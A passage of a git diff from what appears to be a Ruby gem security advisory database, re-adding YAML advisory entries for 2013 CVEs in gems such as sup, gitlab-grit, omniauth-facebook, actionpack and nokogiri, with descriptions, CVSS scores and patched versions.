+++ b/advisories/_posts/2013-10-22-CVE-2013-4457.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2013-4457 (cocaine): Cocaine Gem for Ruby contains a flaw'
-comments: false
-categories:
-- cocaine
-advisory:
-  gem: cocaine
-  cve: 2013-4457
-  osvdb: 98835
-  ghsa: c43v-hrmg-56r4
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4457
-  title: Cocaine Gem for Ruby contains a flaw
-  date: 2013-10-22
-  description: |
-    Cocaine Gem for Ruby contains a flaw that is due to the method of variable
-    interpolation used by the program. With a specially crafted object, a context-dependent
-    attacker can execute arbitrary commands.
-  cvss_v2: 6.8
-  unaffected_versions:
-  - "< 0.4.0"
-  patched_versions:
-  - ">= 0.5.3"
----
+---
+layout: advisory
+title: 'CVE-2013-4457 (cocaine): Cocaine Gem for Ruby contains a flaw'
+comments: false
+categories:
+- cocaine
+advisory:
+  gem: cocaine
+  cve: 2013-4457
+  osvdb: 98835
+  ghsa: c43v-hrmg-56r4
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4457
+  title: Cocaine Gem for Ruby contains a flaw
+  date: 2013-10-22
+  description: |
+    Cocaine Gem for Ruby contains a flaw that is due to the method of variable
+    interpolation used by the program. With a specially crafted object, a context-dependent
+    attacker can execute arbitrary commands.
+  cvss_v2: 6.8
+  unaffected_versions:
+  - "< 0.4.0"
+  patched_versions:
+  - ">= 0.5.3"
+---
diff --git a/advisories/_posts/2013-10-29-CVE-2013-4478.md b/advisories/_posts/2013-10-29-CVE-2013-4478.md
index a84855cb..1faedc0a 100644
--- a/advisories/_posts/2013-10-29-CVE-2013-4478.md
+++ b/advisories/_posts/2013-10-29-CVE-2013-4478.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'CVE-2013-4478 (sup): Sup wrongly handled the filename of attachments'
-comments: false
-categories:
-- sup
-advisory:
-  gem: sup
-  cve: 2013-4478
-  osvdb: 99074
-  ghsa: 5f2p-6vjv-2q2m
-  url: https://web.archive.org/web/20140524012714/http://rubyforge.org/pipermail/sup-talk/2013-August/004993.html
-  title: Sup wrongly handled the filename of attachments
-  date: 2013-10-29
-  description: |
-    Sup MUA contains a flaw that is triggered when handling email attachment
-    content. This may allow a context-dependent attacker to execute arbitrary commands.
-  cvss_v2: 6.8
-  patched_versions:
-  - "~> 0.13.2.1"
-  - ">= 0.14.1.1"
-  related:
-    cve:
-    - 2013-4479
-    ghsa:
-    - hh2x-7mf9-78fr
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2013-4478
-    - https://github.com/sup-heliotrope/sup/blob/develop/History.txt
-    - https://www.openwall.com/lists/oss-security/2013/10/30/2
-    - https://web.archive.org/web/20140524012714/http://rubyforge.org/pipermail/sup-talk/2013-August/004993.html
-    - https://github.com/sup-heliotrope/sup/commit/8b46cdbfc14e07ca07d403aa28b0e7bc1c544785
-    - https://www.mend.io/vulnerability-database/CVE-2013-4478
-    - https://security-tracker.debian.org/tracker/CVE-2013-4478
-    - https://lwn.net/Articles/575351
-    - https://github.com/advisories/GHSA-5f2p-6vjv-2q2m
----
+---
+layout: advisory
+title: 'CVE-2013-4478 (sup): Sup wrongly handled the filename of attachments'
+comments: false
+categories:
+- sup
+advisory:
+  gem: sup
+  cve: 2013-4478
+  osvdb: 99074
+  ghsa: 5f2p-6vjv-2q2m
+  url: https://web.archive.org/web/20140524012714/http://rubyforge.org/pipermail/sup-talk/2013-August/004993.html
+  title: Sup wrongly handled the filename of attachments
+  date: 2013-10-29
+  description: |
+    Sup MUA contains a flaw that is triggered when handling email attachment
+    content. This may allow a context-dependent attacker to execute arbitrary commands.
+  cvss_v2: 6.8
+  patched_versions:
+  - "~> 0.13.2.1"
+  - ">= 0.14.1.1"
+  related:
+    cve:
+    - 2013-4479
+    ghsa:
+    - hh2x-7mf9-78fr
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2013-4478
+    - https://github.com/sup-heliotrope/sup/blob/develop/History.txt
+    - https://www.openwall.com/lists/oss-security/2013/10/30/2
+    - https://web.archive.org/web/20140524012714/http://rubyforge.org/pipermail/sup-talk/2013-August/004993.html
+    - https://github.com/sup-heliotrope/sup/commit/8b46cdbfc14e07ca07d403aa28b0e7bc1c544785
+    - https://www.mend.io/vulnerability-database/CVE-2013-4478
+    - https://security-tracker.debian.org/tracker/CVE-2013-4478
+    - https://lwn.net/Articles/575351
+    - https://github.com/advisories/GHSA-5f2p-6vjv-2q2m
+---
diff --git a/advisories/_posts/2013-10-29-CVE-2013-4479.md b/advisories/_posts/2013-10-29-CVE-2013-4479.md
index f20cefc5..66370b88 100644
--- a/advisories/_posts/2013-10-29-CVE-2013-4479.md
+++ b/advisories/_posts/2013-10-29-CVE-2013-4479.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'CVE-2013-4479 (sup): Sup did not sanitize the content-type of attachments'
-comments: false
-categories:
-- sup
-advisory:
-  gem: sup
-  cve: 2013-4479
-  osvdb: 99074
-  ghsa: hh2x-7mf9-78fr
-  url: https://web.archive.org/web/20140524005344/http://rubyforge.org/pipermail/sup-talk/2013-October/004996.html
-  title: Sup did not sanitize the content-type of attachments
-  date: 2013-10-29
-  description: |
-    Sup MUA contains a flaw that is triggered when handling email attachment
-    content. This may allow a context-dependent attacker to execute arbitrary commands.
-  cvss_v2: 6.8
-  patched_versions:
-  - "~> 0.13.2.1"
-  - ">= 0.14.1.1"
-  related:
-    cve:
-    - 2013-4478
-    ghsa:
-    - 5f2p-6vjv-2q2m
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2013-4479
-    - https://web.archive.org/web/20140524005344/http://rubyforge.org/pipermail/sup-talk/2013-October/004996.html
-    - https://seclists.org/fulldisclosure/2013/Oct/272
-    - https://seclists.org/fulldisclosure/2013/Oct/att-272/whatsup.txt
-    - https://www.openwall.com/lists/oss-security/2013/10/30/2
-    - https://github.com/sup-heliotrope/sup/commit/ca0302e0c716682d2de22e9136400c704cc93e42
-    - https://security-tracker.debian.org/tracker/CVE-2013-4479
-    - https://lwn.net/Articles/575351
-    - https://github.com/advisories/GHSA-hh2x-7mf9-78fr
----
+---
+layout: advisory
+title: 'CVE-2013-4479 (sup): Sup did not sanitize the content-type of attachments'
+comments: false
+categories:
+- sup
+advisory:
+  gem: sup
+  cve: 2013-4479
+  osvdb: 99074
+  ghsa: hh2x-7mf9-78fr
+  url: https://web.archive.org/web/20140524005344/http://rubyforge.org/pipermail/sup-talk/2013-October/004996.html
+  title: Sup did not sanitize the content-type of attachments
+  date: 2013-10-29
+  description: |
+    Sup MUA contains a flaw that is triggered when handling email attachment
+    content. This may allow a context-dependent attacker to execute arbitrary commands.
+  cvss_v2: 6.8
+  patched_versions:
+  - "~> 0.13.2.1"
+  - ">= 0.14.1.1"
+  related:
+    cve:
+    - 2013-4478
+    ghsa:
+    - 5f2p-6vjv-2q2m
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2013-4479
+    - https://web.archive.org/web/20140524005344/http://rubyforge.org/pipermail/sup-talk/2013-October/004996.html
+    - https://seclists.org/fulldisclosure/2013/Oct/272
+    - https://seclists.org/fulldisclosure/2013/Oct/att-272/whatsup.txt
+    - https://www.openwall.com/lists/oss-security/2013/10/30/2
+    - https://github.com/sup-heliotrope/sup/commit/ca0302e0c716682d2de22e9136400c704cc93e42
+    - https://security-tracker.debian.org/tracker/CVE-2013-4479
+    - https://lwn.net/Articles/575351
+    - https://github.com/advisories/GHSA-hh2x-7mf9-78fr
+---
diff --git a/advisories/_posts/2013-11-04-CVE-2013-4489.md b/advisories/_posts/2013-11-04-CVE-2013-4489.md
index ed152222..60bec8c8 100644
--- a/advisories/_posts/2013-11-04-CVE-2013-4489.md
+++ b/advisories/_posts/2013-11-04-CVE-2013-4489.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2013-4489 (gitlab-grit): GitLab Grit Gem for Ruby contains a flaw'
-comments: false
-categories:
-- gitlab-grit
-advisory:
-  gem: gitlab-grit
-  cve: 2013-4489
-  osvdb: 99370
-  ghsa: 95xq-v4m2-fq3r
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4489
-  title: GitLab Grit Gem for Ruby contains a flaw
-  date: 2013-11-04
-  description: |
-    GitLab Grit Gem for Ruby contains a flaw in the app/contexts/search_context.rb
-    script. The issue is triggered when input passed via the code search box is not
-    properly sanitized, which allows strings to be evaluated by the Bourne shell. This
-    may allow a remote attacker to execute arbitrary commands.
-  patched_versions:
-  - ">= 2.6.1"
----
+---
+layout: advisory
+title: 'CVE-2013-4489 (gitlab-grit): GitLab Grit Gem for Ruby contains a flaw'
+comments: false
+categories:
+- gitlab-grit
+advisory:
+  gem: gitlab-grit
+  cve: 2013-4489
+  osvdb: 99370
+  ghsa: 95xq-v4m2-fq3r
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4489
+  title: GitLab Grit Gem for Ruby contains a flaw
+  date: 2013-11-04
+  description: |
+    GitLab Grit Gem for Ruby contains a flaw in the app/contexts/search_context.rb
+    script. The issue is triggered when input passed via the code search box is not
+    properly sanitized, which allows strings to be evaluated by the Bourne shell. This
+    may allow a remote attacker to execute arbitrary commands.
+  patched_versions:
+  - ">= 2.6.1"
+---
diff --git a/advisories/_posts/2013-11-12-CVE-2013-4562.md b/advisories/_posts/2013-11-12-CVE-2013-4562.md
index e9bfd096..64e0ed9b 100644
--- a/advisories/_posts/2013-11-12-CVE-2013-4562.md
+++ b/advisories/_posts/2013-11-12-CVE-2013-4562.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2013-4562 (omniauth-facebook): omniauth-facebook Gem for Ruby Unspecified
-  CSRF'
-comments: false
-categories:
-- omniauth-facebook
-advisory:
-  gem: omniauth-facebook
-  cve: 2013-4562
-  osvdb: 99693
-  ghsa: cf36-985g-v73c
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4562
-  title: omniauth-facebook Gem for Ruby Unspecified CSRF
-  date: 2013-11-12
-  description: |
-    omniauth-facebook Gem for Ruby contains a flaw as HTTP requests do not
-    require multiple steps, explicit confirmation, or a unique token when
-    performing certain sensitive actions. By tricking a user into following
-    a specially crafted link, a context-dependent attacker can perform a
-    Cross-Site Request Forgery (CSRF / XSRF) attack causing the victim to
-    perform an unspecified action.
-  cvss_v2: 6.8
-  unaffected_versions:
-  - "<= 1.4.0"
-  patched_versions:
-  - ">= 1.5.0"
----
+---
+layout: advisory
+title: 'CVE-2013-4562 (omniauth-facebook): omniauth-facebook Gem for Ruby Unspecified
+  CSRF'
+comments: false
+categories:
+- omniauth-facebook
+advisory:
+  gem: omniauth-facebook
+  cve: 2013-4562
+  osvdb: 99693
+  ghsa: cf36-985g-v73c
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4562
+  title: omniauth-facebook Gem for Ruby Unspecified CSRF
+  date: 2013-11-12
+  description: |
+    omniauth-facebook Gem for Ruby contains a flaw as HTTP requests do not
+    require multiple steps, explicit confirmation, or a unique token when
+    performing certain sensitive actions. By tricking a user into following
+    a specially crafted link, a context-dependent attacker can perform a
+    Cross-Site Request Forgery (CSRF / XSRF) attack causing the victim to
+    perform an unspecified action.
+  cvss_v2: 6.8
+  unaffected_versions:
+  - "<= 1.4.0"
+  patched_versions:
+  - ">= 1.5.0"
+---
diff --git a/advisories/_posts/2013-11-14-CVE-2013-4593.md b/advisories/_posts/2013-11-14-CVE-2013-4593.md
index 44e1d4e5..5cb8ff49 100644
--- a/advisories/_posts/2013-11-14-CVE-2013-4593.md
+++ b/advisories/_posts/2013-11-14-CVE-2013-4593.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2013-4593 (omniauth-facebook): omniauth-facebook Gem for Ruby Insecure
-  Access Token Handling Authentication Bypass'
-comments: false
-categories:
-- omniauth-facebook
-advisory:
-  gem: omniauth-facebook
-  cve: 2013-4593
-  osvdb: 99888
-  ghsa: 33vg-hpx5-pfxg
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4593
-  title: omniauth-facebook Gem for Ruby Insecure Access Token Handling Authentication
-    Bypass
-  date: 2013-11-14
-  description: |
-    omniauth-facebook Gem for Ruby contains a flaw that is due to the application
-    supporting passing the access token via the URL. This may allow a remote
-    attacker to bypass authentication and authenticate as another user.
-  cvss_v2: 6.8
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.5.1"
----
+---
+layout: advisory
+title: 'CVE-2013-4593 (omniauth-facebook): omniauth-facebook Gem for Ruby Insecure
+  Access Token Handling Authentication Bypass'
+comments: false
+categories:
+- omniauth-facebook
+advisory:
+  gem: omniauth-facebook
+  cve: 2013-4593
+  osvdb: 99888
+  ghsa: 33vg-hpx5-pfxg
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4593
+  title: omniauth-facebook Gem for Ruby Insecure Access Token Handling Authentication
+    Bypass
+  date: 2013-11-14
+  description: |
+    omniauth-facebook Gem for Ruby contains a flaw that is due to the application
+    supporting passing the access token via the URL. This may allow a remote
+    attacker to bypass authentication and authenticate as another user.
+  cvss_v2: 6.8
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.5.1"
+---
diff --git a/advisories/_posts/2013-12-02-CVE-2013-6421.md b/advisories/_posts/2013-12-02-CVE-2013-6421.md
index 3a2e11c4..973318e3 100644
--- a/advisories/_posts/2013-12-02-CVE-2013-6421.md
+++ b/advisories/_posts/2013-12-02-CVE-2013-6421.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2013-6421 (sprout): sprout Gem for Ruby archive_unpacker.rb unpack_zip()
-  Function Multiple Parameter Arbitrary Code Execution'
-comments: false
-categories:
-- sprout
-advisory:
-  gem: sprout
-  cve: 2013-6421
-  osvdb: 100598
-  ghsa: 229r-pqp6-8w6g
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-6421
-  title: sprout Gem for Ruby archive_unpacker.rb unpack_zip() Function Multiple Parameter
-    Arbitrary Code Execution
-  date: 2013-12-02
-  description: |
-    sprout Gem for Ruby contains a flaw in the unpack_zip() function in
-    archive_unpacker.rb. The issue is due to the program failing to properly
-    sanitize input passed via the 'zip_file', 'dir', 'zip_name', and 'output'
-    parameters. This may allow a context-dependent attacker to execute arbitrary
-    code.
-  cvss_v2: 7.5
-  unaffected_versions:
-  - "< 0.7.246"
----
+---
+layout: advisory
+title: 'CVE-2013-6421 (sprout): sprout Gem for Ruby archive_unpacker.rb unpack_zip()
+  Function Multiple Parameter Arbitrary Code Execution'
+comments: false
+categories:
+- sprout
+advisory:
+  gem: sprout
+  cve: 2013-6421
+  osvdb: 100598
+  ghsa: 229r-pqp6-8w6g
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-6421
+  title: sprout Gem for Ruby archive_unpacker.rb unpack_zip() Function Multiple Parameter
+    Arbitrary Code Execution
+  date: 2013-12-02
+  description: |
+    sprout Gem for Ruby contains a flaw in the unpack_zip() function in
+    archive_unpacker.rb. The issue is due to the program failing to properly
+    sanitize input passed via the 'zip_file', 'dir', 'zip_name', and 'output'
+    parameters. This may allow a context-dependent attacker to execute arbitrary
+    code.
+  cvss_v2: 7.5
+  unaffected_versions:
+  - "< 0.7.246"
+---
diff --git a/advisories/_posts/2013-12-03-CVE-2013-4491.md b/advisories/_posts/2013-12-03-CVE-2013-4491.md
index ee41ff4e..6a7bfa4b 100644
--- a/advisories/_posts/2013-12-03-CVE-2013-4491.md
+++ b/advisories/_posts/2013-12-03-CVE-2013-4491.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2013-4491 (actionpack): Reflective XSS Vulnerability in Ruby on Rails'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2013-4491
-  osvdb: 100528
-  ghsa: 699m-mcjm-9cw8
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/pLrh6DUw998
-  title: Reflective XSS Vulnerability in Ruby on Rails
-  date: 2013-12-03
-  description: |
-    There is a vulnerability in the internationalization component of Ruby on
-    Rails. Under certain common configurations an attacker can provide specially
-    crafted input which will execute a reflective XSS attack.
-
-    The root cause of this issue is a vulnerability in the i18n gem which has
-    been assigned the identifier CVE-2013-4492.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 3.2.16"
-  - ">= 4.0.2"
----
+---
+layout: advisory
+title: 'CVE-2013-4491 (actionpack): Reflective XSS Vulnerability in Ruby on Rails'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2013-4491
+  osvdb: 100528
+  ghsa: 699m-mcjm-9cw8
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/pLrh6DUw998
+  title: Reflective XSS Vulnerability in Ruby on Rails
+  date: 2013-12-03
+  description: |
+    There is a vulnerability in the internationalization component of Ruby on
+    Rails. Under certain common configurations an attacker can provide specially
+    crafted input which will execute a reflective XSS attack.
+
+    The root cause of this issue is a vulnerability in the i18n gem which has
+    been assigned the identifier CVE-2013-4492.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 3.2.16"
+  - ">= 4.0.2"
+---
diff --git a/advisories/_posts/2013-12-03-CVE-2013-4492.md b/advisories/_posts/2013-12-03-CVE-2013-4492.md
index 0e151cda..89fadbf1 100644
--- a/advisories/_posts/2013-12-03-CVE-2013-4492.md
+++ b/advisories/_posts/2013-12-03-CVE-2013-4492.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2013-4492 (i18n): i18n missing translation error message XSS'
-comments: false
-categories:
-- i18n
-advisory:
-  gem: i18n
-  cve: 2013-4492
-  osvdb: 100528
-  ghsa: r5hc-9xx5-97rw
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/pLrh6DUw998
-  title: i18n missing translation error message XSS
-  date: 2013-12-03
-  description: |
-    The HTML exception message raised by I18n::MissingTranslation fails
-    to escape the keys.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 0.5.1"
-  - ">= 0.6.6"
----
+---
+layout: advisory
+title: 'CVE-2013-4492 (i18n): i18n missing translation error message XSS'
+comments: false
+categories:
+- i18n
+advisory:
+  gem: i18n
+  cve: 2013-4492
+  osvdb: 100528
+  ghsa: r5hc-9xx5-97rw
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/pLrh6DUw998
+  title: i18n missing translation error message XSS
+  date: 2013-12-03
+  description: |
+    The HTML exception message raised by I18n::MissingTranslation fails
+    to escape the keys.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 0.5.1"
+  - ">= 0.6.6"
+---
diff --git a/advisories/_posts/2013-12-03-CVE-2013-6414.md b/advisories/_posts/2013-12-03-CVE-2013-6414.md
index 2e544b88..defaba71 100644
--- a/advisories/_posts/2013-12-03-CVE-2013-6414.md
+++ b/advisories/_posts/2013-12-03-CVE-2013-6414.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2013-6414 (actionpack): Denial of Service Vulnerability in Action View'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2013-6414
-  osvdb: 100525
-  ghsa: mpxf-gcw2-pw5q
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/A-ebV4WxzKg
-  title: Denial of Service Vulnerability in Action View
-  date: 2013-12-03
-  description: |
-    There is a denial of service vulnerability in the header handling component of
-    Action View.
-  cvss_v2: 5.0
-  unaffected_versions:
-  - "~> 2.3.0"
-  patched_versions:
-  - "~> 3.2.16"
-  - ">= 4.0.2"
----
+---
+layout: advisory
+title: 'CVE-2013-6414 (actionpack): Denial of Service Vulnerability in Action View'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2013-6414
+  osvdb: 100525
+  ghsa: mpxf-gcw2-pw5q
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/A-ebV4WxzKg
+  title: Denial of Service Vulnerability in Action View
+  date: 2013-12-03
+  description: |
+    There is a denial of service vulnerability in the header handling component of
+    Action View.
+  cvss_v2: 5.0
+  unaffected_versions:
+  - "~> 2.3.0"
+  patched_versions:
+  - "~> 3.2.16"
+  - ">= 4.0.2"
+---
diff --git a/advisories/_posts/2013-12-03-CVE-2013-6415.md b/advisories/_posts/2013-12-03-CVE-2013-6415.md
index 70af34f3..c576807f 100644
--- a/advisories/_posts/2013-12-03-CVE-2013-6415.md
+++ b/advisories/_posts/2013-12-03-CVE-2013-6415.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2013-6415 (actionpack): XSS Vulnerability in number_to_currency'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2013-6415
-  osvdb: 100524
-  ghsa: 6h5q-96hp-9jgm
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/9WiRn2nhfq0
-  title: XSS Vulnerability in number_to_currency
-  date: 2013-12-03
-  description: |
-    There is an XSS vulnerability in the number_to_currency helper in Ruby on Raile.
-    The number_to_currency helper allows users to nicely format a numeric value. One
-    of the parameters to the helper (unit) is not escaped correctly.  Applications
-    which pass user controlled data as the unit parameter are vulnerable to an XSS attack.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 3.2.16"
-  - ">= 4.0.2"
----
+---
+layout: advisory
+title: 'CVE-2013-6415 (actionpack): XSS Vulnerability in number_to_currency'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2013-6415
+  osvdb: 100524
+  ghsa: 6h5q-96hp-9jgm
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/9WiRn2nhfq0
+  title: XSS Vulnerability in number_to_currency
+  date: 2013-12-03
+  description: |
+    There is an XSS vulnerability in the number_to_currency helper in Ruby on Raile.
+    The number_to_currency helper allows users to nicely format a numeric value. One
+    of the parameters to the helper (unit) is not escaped correctly.  Applications
+    which pass user controlled data as the unit parameter are vulnerable to an XSS attack.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 3.2.16"
+  - ">= 4.0.2"
+---
diff --git a/advisories/_posts/2013-12-03-CVE-2013-6416.md b/advisories/_posts/2013-12-03-CVE-2013-6416.md
index 500dbc00..c2c81d95 100644
--- a/advisories/_posts/2013-12-03-CVE-2013-6416.md
+++ b/advisories/_posts/2013-12-03-CVE-2013-6416.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2013-6416 (actionpack): XSS Vulnerability in simple_format helper'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2013-6416
-  osvdb: 100526
-  ghsa: w37c-q653-qg95
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/5ZI1-H5OoIM
-  title: XSS Vulnerability in simple_format helper
-  date: 2013-12-03
-  description: |
-    There is a vulnerability in the simple_format helper in Ruby on Rails.
-    The simple_format helper converts user supplied text into html text
-    which is intended to be safe for display. A change made to the
-    implementation of this helper means that any user provided HTML
-    attributes will not be escaped correctly. As a result of this error,
-    applications which pass user-controlled data to be included as html
-    attributes will be vulnerable to an XSS attack.
-  cvss_v2: 4.3
-  unaffected_versions:
-  - "~> 2.3.0"
-  - "~> 3.1.0"
-  - "~> 3.2.0"
-  patched_versions:
-  - ">= 4.0.2"
----
+---
+layout: advisory
+title: 'CVE-2013-6416 (actionpack): XSS Vulnerability in simple_format helper'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2013-6416
+  osvdb: 100526
+  ghsa: w37c-q653-qg95
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/5ZI1-H5OoIM
+  title: XSS Vulnerability in simple_format helper
+  date: 2013-12-03
+  description: |
+    There is a vulnerability in the simple_format helper in Ruby on Rails.
+    The simple_format helper converts user supplied text into html text
+    which is intended to be safe for display. A change made to the
+    implementation of this helper means that any user provided HTML
+    attributes will not be escaped correctly. As a result of this error,
+    applications which pass user-controlled data to be included as html
+    attributes will be vulnerable to an XSS attack.
+  cvss_v2: 4.3
+  unaffected_versions:
+  - "~> 2.3.0"
+  - "~> 3.1.0"
+  - "~> 3.2.0"
+  patched_versions:
+  - ">= 4.0.2"
+---
diff --git a/advisories/_posts/2013-12-03-CVE-2013-6417.md b/advisories/_posts/2013-12-03-CVE-2013-6417.md
index 1bb115ae..e0ee0a45 100644
--- a/advisories/_posts/2013-12-03-CVE-2013-6417.md
+++ b/advisories/_posts/2013-12-03-CVE-2013-6417.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2013-6417 (actionpack): Incomplete fix to CVE-2013-0155 (Unsafe Query
-  Generation Risk)'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2013-6417
-  osvdb: 100527
-  ghsa: wpw7-wxjm-cw8r
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/niK4drpSHT4
-  title: Incomplete fix to CVE-2013-0155 (Unsafe Query Generation Risk)
-  date: 2013-12-03
-  description: |
-    The prior fix to CVE-2013-0155 was incomplete and the use of common
-    3rd party libraries can accidentally circumvent the protection. Due
-    to the way that Rack::Request and Rails::Request interact, it is
-    possible for a 3rd party or custom rack middleware to parse the
-    parameters insecurely and store them in the same key that Rails uses
-    for its own parameters.  In the event that happens the application
-    will receive unsafe parameters and could be vulnerable to the earlier
-    vulnerability.
-  cvss_v2: 6.4
-  patched_versions:
-  - "~> 3.2.16"
-  - ">= 4.0.2"
----
+---
+layout: advisory
+title: 'CVE-2013-6417 (actionpack): Incomplete fix to CVE-2013-0155 (Unsafe Query
+  Generation Risk)'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2013-6417
+  osvdb: 100527
+  ghsa: wpw7-wxjm-cw8r
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/niK4drpSHT4
+  title: Incomplete fix to CVE-2013-0155 (Unsafe Query Generation Risk)
+  date: 2013-12-03
+  description: |
+    The prior fix to CVE-2013-0155 was incomplete and the use of common
+    3rd party libraries can accidentally circumvent the protection. Due
+    to the way that Rack::Request and Rails::Request interact, it is
+    possible for a 3rd party or custom rack middleware to parse the
+    parameters insecurely and store them in the same key that Rails uses
+    for its own parameters.  In the event that happens the application
+    will receive unsafe parameters and could be vulnerable to the earlier
+    vulnerability.
+  cvss_v2: 6.4
+  patched_versions:
+  - "~> 3.2.16"
+  - ">= 4.0.2"
+---
diff --git a/advisories/_posts/2013-12-12-CVE-2013-7086.md b/advisories/_posts/2013-12-12-CVE-2013-7086.md
index ed73180b..d9ad5972 100644
--- a/advisories/_posts/2013-12-12-CVE-2013-7086.md
+++ b/advisories/_posts/2013-12-12-CVE-2013-7086.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2013-7086 (webbynode): Webbynode Gem for Ruby notify.rb growlnotify Message
-  Handling Arbitrary Command Execution'
-comments: false
-categories:
-- webbynode
-advisory:
-  gem: webbynode
-  cve: 2013-7086
-  osvdb: 100920
-  ghsa: p65m-qr5x-rrqq
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7086
-  title: Webbynode Gem for Ruby notify.rb growlnotify Message Handling Arbitrary Command
-    Execution
-  date: 2013-12-12
-  description: |
-    Webbynode Gem for Ruby contains a flaw in notify.rb that is triggered
-    when handling a specially crafted growlnotify message. This may allow a
-    context-dependent attacker to execute arbitrary commands.
-  cvss_v2: 7.5
----
+---
+layout: advisory
+title: 'CVE-2013-7086 (webbynode): Webbynode Gem for Ruby notify.rb growlnotify Message
+  Handling Arbitrary Command Execution'
+comments: false
+categories:
+- webbynode
+advisory:
+  gem: webbynode
+  cve: 2013-7086
+  osvdb: 100920
+  ghsa: p65m-qr5x-rrqq
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7086
+  title: Webbynode Gem for Ruby notify.rb growlnotify Message Handling Arbitrary Command
+    Execution
+  date: 2013-12-12
+  description: |
+    Webbynode Gem for Ruby contains a flaw in notify.rb that is triggered
+    when handling a specially crafted growlnotify message. This may allow a
+    context-dependent attacker to execute arbitrary commands.
+  cvss_v2: 7.5
+---
diff --git a/advisories/_posts/2013-12-14-CVE-2013-6460.md b/advisories/_posts/2013-12-14-CVE-2013-6460.md
index 81086b04..c9f7defb 100644
--- a/advisories/_posts/2013-12-14-CVE-2013-6460.md
+++ b/advisories/_posts/2013-12-14-CVE-2013-6460.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2013-6460 (nokogiri): CVE-2013-6460 rubygem-nokogiri: DoS while parsing
-  XML documents'
-comments: false
-categories:
-- nokogiri
-- jruby
-advisory:
-  gem: nokogiri
-  platform: jruby
-  cve: 2013-6460
-  osvdb: 101179
-  ghsa: 62qp-3fxm-9wxf
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-6460
-  title: 'CVE-2013-6460 rubygem-nokogiri: DoS while parsing XML documents'
-  date: 2013-12-14
-  description: |
-    Nokogiri gem 1.5.x has Denial of Service via infinite loop when parsing
-    XML documents
-  cvss_v2: 4.3
-  cvss_v3: 6.5
-  patched_versions:
-  - "~> 1.5.11"
-  - ">= 1.6.1"
----
+---
+layout: advisory
+title: 'CVE-2013-6460 (nokogiri): CVE-2013-6460 rubygem-nokogiri: DoS while parsing
+  XML documents'
+comments: false
+categories:
+- nokogiri
+- jruby
+advisory:
+  gem: nokogiri
+  platform: jruby
+  cve: 2013-6460
+  osvdb: 101179
+  ghsa: 62qp-3fxm-9wxf
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-6460
+  title: 'CVE-2013-6460 rubygem-nokogiri: DoS while parsing XML documents'
